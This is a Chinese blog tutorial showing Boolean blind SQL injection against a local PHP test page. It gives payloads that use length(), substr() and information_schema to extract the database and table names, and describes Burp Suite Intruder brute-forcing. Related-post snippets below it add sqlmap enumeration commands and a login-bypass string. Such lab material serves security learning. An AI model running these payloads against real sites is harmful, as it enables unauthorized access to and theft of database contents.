sql注释符注入防御_Boolean注入攻击

最新推荐文章于 2022-05-25 00:47:48 发布
最新推荐文章于 2022-05-25 00:47:48 发布
阅读量175 收藏
点赞数
文章标签: sql注释符注入防御
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34547167/article/details/112325524
版权
d2a15ccf2fec79cca1a93e6fa1f185ff.png

0x0测试源代码,同理扔进phpstudy的根目录运行

0x01访问测试地址:http://localhost/boolean_inject.php?id=1

38537c0c2f8a39dc6fbcf3c0bd343377.png

访问测试页面

页面出现yes的字样,在url后面添加一个单引号,效果:

d21507b12cadef9fa856604ca26a9a81.png

出现no响应

继续测试id=1' and 1=1%23和 id=1' and 1=2%23

6e56e8eb7cce6a9ce9ee2ccad20d42b3.png

id=1' and 1=1%23

50d0339e94ff04bcd0ba8f4644c591ad.png

id=1' and 1=2%23

可以看出页面只返回yes或no,没有返回数据库相关数据,这里不能使用union注入。现在尝试使用新的Boolean注入,Boolean注入构造SQL判断句,通过返回结果推测哪些SQL判断条件是否成立,通过依次判断取得数据库相关信息。

测试语句如下:

' and length(database())>=1 --+

1数字可以是任意数字,有前面的单引号需要注释符注释--+,分别测试2,3,4返回情况:

d445ebdfa0cada982b0d38e4b91bf2d3.png

1返回页面情况

7483e7028940e9bc54df8cd64f159de4.png

2返回页面情况

b9ca8cf342fd1d454beb810b322df3bb.png

3返回页面情况

7d6c889ed2a3429d7983ae00249b9c4b.png

4返回情况

b2bfd51f755cada2540b44dbf38784cf.png

5返回情况

看得出5出现no结果,可以判断数据库名长度为4。

接着逐个字符获取数据库名。使用burpsuite进行爆破,测试语句:

' and substr(database(),1,1)='t'--+

substr是截取的意思,上述表达截取database()的值,从第一个字符开始,每次只返回一个。

跟limit的区别是:limit是从0开始排序,这里从1开始。一般数据库名范围在a~z、0~9之内,可能还有一些特殊的字符。

抓包:

959f12065f18e09dd8b39a2e2b2e8909.png

抓包效果

发到intruder模块进行爆破,

e91fd3f44dc478f74d912b7f66d69576.png

设置参数t为可变动

836ba1a507ee4d1c440b589811a82a83.png

设置爆破方式和参数

2d14a68bcb8e9fde3e6d6a2b17f31731.png

设置页面匹配为yes结果

进行爆破:

ad6a125b352f1793079f11c2974e5990.png

获得爆破结果

可以看到t字符页面是yes,依次类推爆破位置2的字母,最后爆破出数据库名为test.

下面操作表名:

' and substr((select table_name information_schema.tables where table_schema='test' limit 0,1),1,1)='i'--+

edcba4bbfd18f9a2b1e87e58b989b917.png

同理爆出表名第一个字母u

依次类推爆出所剩下的字段。

本次测试代码:

a372e533444a753c8c63ba65a3dd164a.png

测试代码

preg_match判断输入参数是否有危险字符,像unionsleepbenchmark。当访问页面代码根据查询结果返回yes或no。

下节讲下报错注入攻击的方法。

伍媚
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql注入代码_SQL注入之代码层防御
weixin_32002013的博客
01-19 516
[目录]0x0 前言0x1 领域驱动的安全1.1 领域驱动的设计1.2 领域驱动的安全示例0x2 使用参数化查询2.1 参数化查询2.2 Java中的参数化语句2.3 .NET(C#)中的参数化语句2.4 PHP中的参数化语句2.5 PL/SQL中的参数化语句0X3 移动应用中的参数化语句3.1 iOS应用程序中的参数化语句3.2 Android应用程序中的参数化语句3.3 HTML浏览器中存储的...
渗透测试笔记(四)——SQL注入攻击防御(2)
m0_67044952的博客
06-06 476
 sqlmap -u "URL" -dbms=mysql --batch  sqlmap -u "URL" --dbs  sqlmap -u "URL" --users  sqlmap -u "URL" --current-user  ​  # 获得当前数据库  sqlmap -u "URL" --current-db  ​ &n
SQL注入分类、防御
BeatRex的博客
06-13 3232
一、SQL注入分类 按数据类型分 数字类型 后台语句可能为: $id=$_POST['id'] select user,password from users where id=$id 字类型 $id=$_POST['id'] 后台语句可能为:select user,password from users where id='$id' 总结: 数字类型直接将后台接收到用户输入的内容带入到数...
WEB三大攻击之—SQL注入攻击
freeking101的博客
01-28 1612
  From:https://www.daguanren.cc/post/sql-injection.html     SQL注入的定义与诱因 定义 SQL攻击(英语:SQL injection),简称注入攻击,是发生于应用程序之数据库层的安全漏洞。简而言之,是在输入的字串之中注入SQL指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL...
sql注入大全
m0_65041566的博客
05-25 1176
目录 SQL注入原理: SQL注入原理: 用户输出的数据被当作后端代码执行 SQL注入
Sql注入平台.zip
02-21
一个在本地搭建的SQL注入的平台,能够进行SQL注入,适用于GET和POST场景 包含了基于union查询的注入、基于报错的注入、基于floor的报错注入、基于boolean的盲注、基于时间的盲注……
SQL注入漏洞过程实例及解决方案
12-14
boolean flag=login("aaa' OR ' ","1651561"); //若已知用户名,用这种方式便可不用知道密码就可登陆成功 if (flag){ System.out.println("登陆成功"); }else{ System.out.println("登陆失败"); } } public ...
ShapeExp2.rar_Shape 2_boolean 五角星
09-14
又有Star实现Shape的area方法,其返回值是0,Star类另有一返回值boolean型方法isStar;在main方法里创建一个Vector,根据随机数的不同向其中加入Shape的不同子类对象(如是1,生成Circle对象;如是2,生成Rectangle...
Test_sget_boolean.rar_sget-boolean
09-23
Test sget boolean extends DxTestCase Source Code for Linux.
Test-Boolean-Firebird.zip_Will_boolean
09-19
This application will test boolean editor on firebird
SQL注入攻击原理与防御措施
一只猿的自我修养
04-30 3811
原理: 所谓SQL注入,就是通过把SQL命令伪装成正常的HTTP请求参数传递到服务端,款骗服务器最终执行恶意的SQL命令,达到入侵目的。攻击者可以利用SQL注入漏洞,查询非授权信息,修改数据库服务器的数据,改变表结构,甚至是获取服务器root权限。总而言之,SQL注入漏洞的危害极大,攻击者采用的SQL指令决定了攻击的威力。目前涉及的大批量数据泄露的攻击事件,大部分都是通过SQL注入来实施的。 示例: 假设某个存在漏洞的网站登录页需要输入用户名和密码,后台接收到参数后是直接拼接SQL查数据库,如:
SQL 注入原理与防御
todd_qwe的博客
04-21 265
学习SQL注入书单原理危害SQL注入流程分类及常用工具防御实战 书单 《SQL注入攻击防御第2版》 原理 注入攻击的本质,是吧用户输入的数据当做代码执行。这里有两个关键条件,第一个是用户能控制输入;第二个是原本程序要执行的代码,拼接了用户输入的数据。当然,想要研究SQL注入需要深入了解每种数据库的SQL语法及特性。 危害 通过SQL注入攻击,可以获取、删除、修改数据库信息,并提供提权来控制we...
SQL 注入的基本防御手段和绕过技术
枫梓林のBlog
04-25 719
SQL 注入的基本防御手段和绕过技术 文章目录SQL 注入的基本防御手段和绕过技术0x01SQL的绕过技术1.大小写绕过2.注释绕过1.1 例1 绕过注释并爆库1.2 例2 使用逻辑运算注入3.双写绕过例1:双写搭配大小写绕过4.关键字等价绕过5.绕过去除空格6.绕过去关键字的绕过例1:大小写绕过例2:双写绕过例3:注释绕过例4:盲注绕过7.MySQL 宽字节绕过8.base 64 编码绕过0x02 二次注入修改其他用户密码0x03 如何SQL注入总结 实验环境 Firefox burp suite
sql注入攻击的原理(sql注入攻击范)
热门推荐
weixin_45901902的博客
08-19 2万+
SQL 注入SQLi)是一种可执行恶意 SQL 语句的注入攻击。这些 SQL 语句可控制网站背后的数据库服务。攻击者可利用 SQL 漏洞绕过网站已有的安全措施。他们可绕过网站的身份认证和授权并访问整个 SQL 数据库的数据。他们也可利用 SQL 注入对数据进行增加、修改和删除操作。 SQL 注入可影响任何使用了 SQL 数据库的网站或应用程序,例如常用的数据库有 MySQL、Oracle、SQL Server 等等。攻击者利用它,便能无需授权地访问你的敏感数据,比如:用户资料、个人数据、商业机密、知识产
sql注入实例分析
weixin_30624825的博客
07-23 3417
什么是SQL注入攻击?引用百度百科的解释: sql注入_百度百科: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执...
SQL注入攻击原理及防御策略
HoewDec的博客
02-23 2232
一.什么是SQL注入 SQL注入,一般指web应用程序对用户输入数据的合法性没有校验或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 总的来说就是,攻击者通过系统正常的输入数据的功能,输入恶意数据,而系统又未作任何的校验,直接信任了用户输入,使得恶意输入改变原本的SQL逻辑或者执行了额外的SQL脚本达,从而造成了SQL注入攻击。 二.SQL注入的危害及
SQL注入攻击详解
谢世杰的博客
03-03 7969
一、什么是SQL注入 SQL 注入SQLi)是一种注入攻击,,可以执行恶意 SQL 语句。它通过将任意 SQL 代码插入数据库查询,使攻击者能够完全控制 Web 应用程序后面的数据库服务器。攻击者可以使用 SQL 注入漏洞绕过应用程序安全措施;可以绕过网页或 Web 应用程序的身份验证和授权,并检索整个 SQL 数据库的内容;还可以使用 SQL 注入来添加,修改和删除数据库中的记录。 SQL 注...
Java程序员从笨鸟到菜鸟之(一百零二)sql注入攻击详解(三)sql注入解决办法...
红太阳照大地
11-05 816
在前面的博客中,我们详细介绍了: sql注入攻击详解(二)sql注入过程详解 sql注入攻击详解(一)sql注入原理详解 我们了解了sql注入原理和sql注入过程,今天我们就来了解一下sql注入的解决办法。怎么来解决和sql注入,由于本人主要是搞javaweb开发的小程序员,所以这里我只讲一下有关于javaweb的止办法。其实对于其他的,思路基本相似。下面我们先...
sql注入中的--+注释问题探索
老夏家的云
01-15 2万+
sql-labs游戏中,经常使用--+放在最后注释多余部分,而mysql中的注释为#和-- 却不能直接使用,以前没学过mysql,一直不理解,也不知道+号的作用,今天有时间特地探索了一下,算是搞明白了其中的原因。 sql-labs闯关游戏资源及介绍见此:https://github.com/Audi-1/sqli-labs 第一关示例: 在源代码中加入下面两行,使网页能回显我们输入的有效...
json_object_new_boolean
最新发布
05-26
json_object_new_boolean 是一个函数,用于创建一个新的 json_boolean 类型的 json_object 对象。它接受一个 int 类型的参数,如果参数为 0,则创建的 json_boolean 对象的值为 false,否则创建的 json_boolean 对象...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值